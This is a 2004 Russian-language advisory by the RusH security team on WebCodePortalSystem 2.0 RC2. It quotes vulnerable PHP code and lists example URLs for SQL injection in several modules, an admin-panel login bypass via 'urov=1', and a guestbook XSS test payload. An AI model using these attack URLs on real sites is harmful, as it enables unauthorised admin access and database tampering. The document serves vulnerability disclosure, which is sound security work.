__________               ___ ___  
\______   \__ __  ______/   |   \ 
 |       _/  |  \/  ___/    _    \
 |    |   \  |  /\___ \\         /
 |____|_  /____//____  >\___|_  / 
 -======\/==security=\/=team==\/

Advisory#20
Продукт: WebCodePortalSystem (WCPS)
Версия: 2.0 Release Candidate 2 (возможно более ранние)
Авторы: WebCode-Command (http://wcps.ru/)

Уязвимости:
^^^^^^^^^^^ 
- Многочисленные ошибки типа SQL injection
- Обход авторизации
- XSS в модуле guestbook

Описание:
^^^^^^^^^
•••••••••••••••••••••••••••••••••••
 1. SQL injection в модуле catalog
•••••••••••••••••••••••••••••••••••

1.1 Уязвимость найдена в файле /wcps/mod/catalog/tema.php
---
30: if($by==""){$by="click";}
31: if($order==""){$order="DESC";}
32: $result_stat=MYSQL_QUERY('SELECT id,categoria,title,mini_text,click from '.$wcpref.'catalog_stat WHERE  categoria='.
33: $cat_id. '  order by ' .$by. ' ' .$order. '  LIMIT '.
34: $list. ', 10');
---

Переменная $cat_id не проверяется перед помещением в запрос.

http://example.com/wcps/index.php?nma=catalog&fla=tema&cat_id=[SQL_CODE_HERE]

Переменная $by не проверяется перед помещением в запрос.

http://example.com/wcps/index.php?nma=catalog&fla=tema&cat_id=1&by=[SQL_CODE_HERE]

Переменная $order не проверяется перед помещением в запрос.

http://example.com/wcps/index.php?nma=catalog&fla=tema&cat_id=1&by=click&order=[SQL_CODE_HERE]

1.2 Уязвимость найдена в файле /wcps/mod/catalog/allstat.php
---
37: $result_stat = MYSQL_QUERY('SELECT id,categoria,title,click from '.$wcpref.'catalog_stat WHERE  categoria='.
38: $cat_id. '  order by ' .$by. ' ' .$order. ' ');
---

Использование:

http://example.com/wcps/index.php?nma=catalog&fla=allstat&cat_id=[SQL_CODE_HERE]
http://example.com/wcps/index.php?nma=catalog&fla=allstat&cat_id=1&by=[SQL_CODE_HERE]
http://example.com/wcps/index.php?nma=catalog&fla=allstat&cat_id=1&by=click&order=[SQL_CODE_HERE] 

••••••••••••••••••••••••••••••••••••
 2. SQL injection в модуле download
••••••••••••••••••••••••••••••••••••

Уязвимость найдена в файле /wcps/mod/download/download.php
---
20: $sql=mysql_query("select title,count,url from ".$wcpref."download where id=".$id);
---

Использование:

http://example.com/wcps/index.php?nma=download&fla=download&id=[SQL_CODE_HERE]

••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
 3. SQL injection во всех модулях в результате отсутствия проверки переменной $wcpref
••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••

Примеры:
http://example.com/wcps/index.php?nma=ban&fla=index&wcpref=[SQL_CODE_HERE]
http://example.com/wcps/index.php?nma=blocks&fla=index&wcpref=[SQL_CODE_HERE]
http://example.com/wcps/index.php?nma=catalog&fla=index&wcpref=[SQL_CODE_HERE]
http://example.com/wcps/index.php?nma=coment&fla=index&wcpref=[SQL_CODE_HERE]
http://example.com/wcps/index.php?nma=comment&fla=index&wcpref=[SQL_CODE_HERE]
http://example.com/wcps/index.php?nma=counter&fla=index&wcpref=[SQL_CODE_HERE]
http://example.com/wcps/index.php?nma=default&fla=index&wcpref=[SQL_CODE_HERE]
http://example.com/wcps/index.php?nma=download&fla=index&wcpref=[SQL_CODE_HERE]
http://example.com/wcps/index.php?nma=lang&fla=index&wcpref=[SQL_CODE_HERE]
http://example.com/wcps/index.php?nma=news&fla=index&wcpref=[SQL_CODE_HERE]
http://example.com/wcps/index.php?nma=privat&fla=index&wcpref=[SQL_CODE_HERE]
http://example.com/wcps/index.php?nma=search&fla=index&wcpref=[SQL_CODE_HERE]
http://example.com/wcps/index.php?nma=thema&fla=index&wcpref=[SQL_CODE_HERE]
http://example.com/wcps/index.php?nma=user&fla=index&wcpref=[SQL_CODE_HERE]

••••••••••••••••••••••••••••••••••••••••••••••••••
 4. Обход авторизации в разделе администрирования
••••••••••••••••••••••••••••••••••••••••••••••••••

Передача скрипту admin.php переменной urov=1 позволяет войти в панель администрирования без ввода логина и пароля администратора.

Пример:
http://example.com/wcps/admin.php?urov=1

•••••••••••••••••••••••••••
 5. XSS в модуле guestbook
•••••••••••••••••••••••••••

При добавлении сообщения в гостевую книгу оно не проверяется и атакующий может внедрить произвольный html-код.
Пример:
Попробуйте добавить в гостевой сообщение типа: <script>alert("XSS")</script> 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1dt.w0lf // RusH security team // www.rst.void.ru // 07.12.2004